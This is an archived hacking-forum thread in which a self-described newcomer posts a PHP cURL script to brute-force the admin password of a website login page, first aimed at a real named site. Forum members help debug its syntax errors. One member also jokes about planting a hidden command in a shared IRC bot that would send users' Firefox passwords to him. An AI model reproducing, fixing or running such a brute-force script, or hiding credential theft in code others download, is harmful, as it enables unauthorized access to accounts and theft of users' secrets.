Zero Identity - General - Programming - What is wrong with this PHP code?

Username: Password: [Forgot Password?] [Not Registered?]

Navigation

Navigation

Challenges

Media

Contribute

ZI Store Updates

Zi Store

Link to UsIf you'd like to become an affilate, please Link to Us!

Online Users

Registered Users: 2016

Latest Registration: yhamrodne

Online Users: 12
(0 Members, 12 Guests)

Poll

If your shout contains ! in the begining, your links will not be clickable.
If you enter the user's full username, it will be highlighted just for that user.Shoutbox

Last Login:
2012-01-20
Joined:
December 11 2009 01:08
Experience:
2 (17 day(s) ago)

The crashed tables for registration and other stuff is easy to fix (using the Mysql command "REPAIR TABLE").

Last Login:
2012-01-20
Joined:
December 11 2009 01:08
Experience:
2 (17 day(s) ago)

Link Bugs List

ttyler333ttyler333

Last Login:
0000-00-00
Joined:
May 09 2008 01:45
Experience:
1095.2 (18 day(s) ago)

according to a friend the registration doesn't work.

Hunter XHunter X

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (18 day(s) ago)

Oh hey, the site's back!

Last Login:
0000-00-00
Joined:
March 30 2008 22:30
Experience:
20492 (19 day(s) ago)

Please do keep a list of all the bugs. They might eventually get fixed.. lol.

Hunter XHunter X

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (01 month(s) ago)

What we could do is start compling a list of bugs on the Tasks page, so if and when development resumes the developers know what needs doing.

Last Login:
2012-01-20
Joined:
December 11 2009 01:08
Experience:
2 (02 month(s) ago)

Kewl, the domain renewed another year.

Any other future plans?

Hunter XHunter X

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (02 month(s) ago)

Huh, Kr0w's posts disappeared.

Hunter XHunter X

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (02 month(s) ago)

I've got no idea. I'll send off an email to one of the admins in a moment to check, since I've been meaning to contact them anyway.

Hunter XHunter X

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (02 month(s) ago)

There seems to be ~10 guests on most days, but I have no idea if that's genuine users or crawler bots. If they are real users we need to do something to convince them to register.

[Shoutbox Archive]

Zero Identity Forums - General - Programming - What is wrong with this PHP code?

Are you bored? Check out the unaswered threads!

muesli Member Newbie Joined: 07/13/2009 Last Seen: 0000-00-00 Experience: 35.8 Points:
	#1 What is wrong with this PHP code? on 01/01/1970 00:00
	This is the error I get: " Parse error: parse error, unexpected $end in \192.168.0.16webfilesfiles2009-73140964brute.php on line 41 " Code Highlighting :: Select Code <?php // configure the bruter with your scenario $target = "http://www.darkmindz.com/login.php"; // your target. $user = "admin"; // the user we are bruting $user_field = "user_name"; // the username field name in form $pass_field = "password"; // the password field name in form $bad = "Wrong username or password"; // message if the user / pass was wrong $list = "path_to_word_list"; // the path to your wordlist // Set the time limit of executing the script to 0 - never set_time_limit(0); // star the normal cURL routine $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POST, 1); // The actual bruting process foreach(file($list) as $line) { $word = str_replace(array(" ", " "), ', $line); $postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields); $res = curl_exec($ch); if(!eregi($bad,$res)) { die("Pass found, it is: {$word}"); // password found } } // close cURL connection curl_close($ch); ?>

3l_f3n1x Member V Fan Professional Analyst Joined: 08/06/2008 Last Seen: 0000-00-00 Experience: 299.25 Points: 905
	#2 on 01/01/1970 00:00
	Ok, I found 1 error and 1 possible error (but I need to run the script to know if that is correct or not)... However I won't tell you where the error(s) is(are) so easily, but first I would like to know if you understand that code... So please tell me: how does this code work? You seem like a nice man and I would like to help you... "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

swiftnomad Administrator Public Relations ZI Guru Joined: 04/04/2008 Last Seen: 0000-00-00 Experience: 3463.68 Points: 490
	#3 on 01/01/1970 00:00
	hehe, there are only 40 lines of code here.. :) Code Highlighting :: Select Code `if (sizeof (problems.txt) > CRITICAL){ exec("> /dev/null"); }` USER: Hello Tech Support? I can't print... ME: Try cursive then <hang up>

pyr0t3chnician Member Too Legit Professional Analyst Joined: 01/04/2009 Last Seen: 0000-00-00 Experience: 455.88 Points: 550
	#4 on 01/01/1970 00:00
	I think maybe this: Code Highlighting :: Select Code `$word = str_replace(array(" ", " "), , $line);` Got an empty space there between ", ,". Could be causing the error. I haven't ran it myself to check tho.

Grindordie Administrator Software Engineer ZI Guru Joined: 11/04/2007 Last Seen: 0000-00-00 Experience: 1207.57 Points: 1100
	#5 Software Engineer on 01/01/1970 00:00
	This looks very familiar to a piece of code I wrote many years ago. Parse error: parse error, unexpected $end Usually means you forgot to close a bracket { } That's not a bug, that's an unexpected feature phpFort - light-weight content management system.

3l_f3n1x Member V Fan Professional Analyst Joined: 08/06/2008 Last Seen: 0000-00-00 Experience: 299.25 Points: 905
	#6 on 01/01/1970 00:00
	I think something is wrong with this line: Code Highlighting :: Select Code `<?php $postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; ?>` "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

muesli Member Newbie Joined: 07/13/2009 Last Seen: 0000-00-00 Experience: 35.8 Points:
	#7 on 01/01/1970 00:00
	well im not gonna lie. i don't know php lol. but i do wanna use the script to brute force. i asked around on some other forums and this is what ive got. Code Highlighting :: Select Code <?php // configure the bruter with your scenario $target = "http://www.example.com/login.php"; // your target. $user = "admin"; // the user we are bruting $user_field = "username"; // the username field name in form $pass_field = "password"; // the password field name in form $bad = "Incorrect Username or Password"; // message if the user / pass was wrong $list = "dictionary.txt"; // the path to your wordlist // star the normal cURL routine $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); // The actual bruting process foreach(file($list) as $line) { $postfields = $user_field."=".$username."&".$pass_field."=".$line; curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields); $res = curl_exec($ch); if(!eregi($bad,$res)) { die("Pass found, it is: {$word}"); // password found } } // close cURL connection curl_close($ch); ?> it doesn't error now, but it still won't work. it just says: "pass found, it is:" and doesn't even give a pass. has anyone else gotten this to work. thanks for your feedback.

pyr0t3chnician Member Too Legit Professional Analyst Joined: 01/04/2009 Last Seen: 0000-00-00 Experience: 455.88 Points: 550
	#8 on 01/01/1970 00:00
	Quote from 3l_f3n1x I think something is wrong with this line: Code Highlighting :: Select Code `<?php $postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; ?>` GAH! You win. I should have looked a little closer. $$$

3l_f3n1x Member V Fan Professional Analyst Joined: 08/06/2008 Last Seen: 0000-00-00 Experience: 299.25 Points: 905
	#9 V Fan on 01/01/1970 00:00
	Quote from pyr0t3chnician GAH! You win. I should have looked a little closer. $$$ Yes those damn dollar signs xD Quote from muesli it doesn't error now, but it still won't work. it just says: "pass found, it is:" and doesn't even give a pass. has anyone else gotten this to work. thanks for your feedback. muesli, I really suggest you learn PHP if you want to understand the code you posted above... I know PHP and I think I know why you don't get good answers with that script... You shouldn't be using some random scripts if you don't understand them... Imagine you run a script in your computer thinking it will bruteforce something but it ends up deleting every file in your harddisk... That would be pretty bad... In some circles, they would consider you a Script Kiddie... Please don't be a Script Kiddie and try to understand the tool you are using... You will see everything clearer and probably you will change the script to suit your needs... If you want help to understand PHP (or any programming language) then you can pm me with your questions. Of course, this is an advice... I will be pretty proud of you if you take it, but God gave us free will so it is your choice :) "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

pyr0t3chnician Member Too Legit Professional Analyst Joined: 01/04/2009 Last Seen: 0000-00-00 Experience: 455.88 Points: 550
	#10 on 01/01/1970 00:00
	Quote from 3l_f3n1x Imagine you run a script in your computer thinking it will bruteforce something but it ends up deleting every file in your harddisk... That would be pretty bad... I have my IRC bot script/class that I posted, and several people have downloaded it and run it without changing the variables. I will be on #zeroidentity and Pyr0sSampleBot shows up, with all his original commands. I was thinking to put some stuff in there so that when it logs on, I type "!passwords" and it will send/post the firefox passwords or something. People will still run it cause they think they understand it. Sad that I could do that, make it completely obvious, and they will still run it.

3l_f3n1x Member V Fan Professional Analyst Joined: 08/06/2008 Last Seen: 0000-00-00 Experience: 299.25 Points: 905
	#11 on 01/01/1970 00:00
	Quote from pyr0t3chnician I have my IRC bot script/class that I posted, and several people have downloaded it and run it without changing the variables. I will be on #zeroidentity and Pyr0sSampleBot shows up, with all his original commands. I was thinking to put some stuff in there so that when it logs on, I type "!passwords" and it will send/post the firefox passwords or something. People will still run it cause they think they understand it. Sad that I could do that, make it completely obvious, and they will still run it. Sometimes it's funny to see braindead people like script kiddies doing stuff like that, but sometimes (and with that I mean almost everytime) it gets pretty annoying... I mean so much stupidity makes me nauseous xD... "Study without thought is labor lost; thought without study is dangerous." - Confucius "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

muesli Member Newbie Joined: 07/13/2009 Last Seen: 0000-00-00 Experience: 35.8 Points:
	#12 on 01/01/1970 00:00
	ok thanks guys, im trying to learn php my self. this is what ive learned to do so far haha. http://muesli.freehostia.com/test.php

3l_f3n1x Member V Fan Professional Analyst Joined: 08/06/2008 Last Seen: 0000-00-00 Experience: 299.25 Points: 905
	#13 on 01/01/1970 00:00
	Well, I am very glad you choose the right path :) If you have questions about programming, just send me a private message and I will help you to find the answer :) I recommend you to install an apache with the PHP modules if you want to experiment with this language. It will be easier to edit your files and see the results. Also you don't depend on an internet connection to test your php scripts. "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

muesli Member Newbie Joined: 07/13/2009 Last Seen: 0000-00-00 Experience: 35.8 Points:
	#14 on 01/01/1970 00:00
	thanks. im installing xampp now. here's a question. can you do scripts like the brute force one in xampp, even though they communicate with websites?

pyr0t3chnician Member Too Legit Professional Analyst Joined: 01/04/2009 Last Seen: 0000-00-00 Experience: 455.88 Points: 550
	#15 on 01/01/1970 00:00
	You can indeed do everything with xampp (it has apache, php, and mysql), but it may require a bit of configuring, as it may not come with 100% of the modules you want installed... however, for learning purposes, it is perfect. This is just my preference, but I have xampp installed on my computer, I also downloaded php separately to run in cmd.exe. For my web applications, I use xampp. But for brute force type scripts (ones that sit in loops for hours) or simple test scripts that only echo out a few lines of data, I use cmd.exe. For me it is easier to open notepad and type :<?php echo md5("hello"); ?>, click save, open command and type: c:phpphp md5.php . Again it is just preference. I have been working with PHP for quite a few years, like most of us here, and are more than willing to help you out if you get stuck on something.

Who is watching forums

Users viewing this page:	Guests (1)
Users viewing the forum:	1

© 2009 ZeroIdentity.org

Powered by phpFort © 2008
Page generated in 0.061 seconds. :: MySQL Queries: 12